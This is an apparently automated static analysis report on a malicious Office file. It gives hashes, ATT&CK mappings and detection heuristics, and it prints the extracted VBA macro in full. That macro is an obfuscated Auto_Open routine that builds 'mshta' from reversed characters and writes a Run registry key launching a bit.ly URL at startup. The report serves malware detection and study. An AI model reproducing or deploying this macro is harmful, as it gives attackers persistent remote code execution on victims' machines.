Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 caf53e4143d03eb3…

MALICIOUS

Office (OOXML)

7.1 KB First seen: 2021-06-20
MD5: 96a60123974dca0f1a310e4fb9306995
SHA-1: 42bd7f26857ef26805664ad83da155cc5a877982
SHA-256: caf53e4143d03eb3e7d952710a9c8dfd43d8e715dac23c983f8673ab21ee8d53
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder

The VBA macro contains an Auto_Open subroutine that executes when the document is opened. This macro uses GetObject to interact with WMI and writes a registry value to 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater' with the value '"https://www.bitly.com/haiasdjaisdjswdhai"'. This action establishes persistence by ensuring the malicious URL is executed on system startup. The URL itself is benign according to reputation data, but its use in persistence is malicious.

Heuristics (6)

  • VBA project inside OOXML (severity: medium; 4 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/.bin)
  • VBA project part renamed to evade filename detection (severity: high; rule: OOXML_VBA_PROJECT_RENAMED)
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro (severity: high; rule: OLE_VBA_AUTO)
    Auto_Open macro
  • GetObject call (severity: high; rule: OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://www.bitly.com/haiasdjaisdjswdhai (channel: in document text, OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 633 bytes
SHA-256: 9c644f080cb52360b863aa2ea8b31af68fd223f5618ef3ec76e6e7d259cc161a
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub Auto_Open()

r = StrReverse("s")
m = StrReverse("M")
p = StrReverse("H")
tu = StrReverse("T")
x = StrReverse("""")
ha = StrReverse("a")
culik = StrReverse("""")
calc = x + m + r + p + tu + ha + culik
Const polooood = &H80000001
mamammakdkd = "."
Set kaosdkqowkdok = GetObject("winmgmts:\\" & mamammakdkd & "\root\default:StdRegProv")
kdkaskllll = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
hotagotamota = "Updater"
pipatatutupu = calc + """https://www.bitly.com/haiasdjaisdjswdhai"""
kaosdkqowkdok.SetStringValue polooood, kdkaskllll, hotagotamota, pipatatutupu

End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: ppt/.bin
Size: 13312 bytes
SHA-256: 6753a78a96ecae9d1690b8ae5815f9d6050de2449d06beb6e3ef15d746826507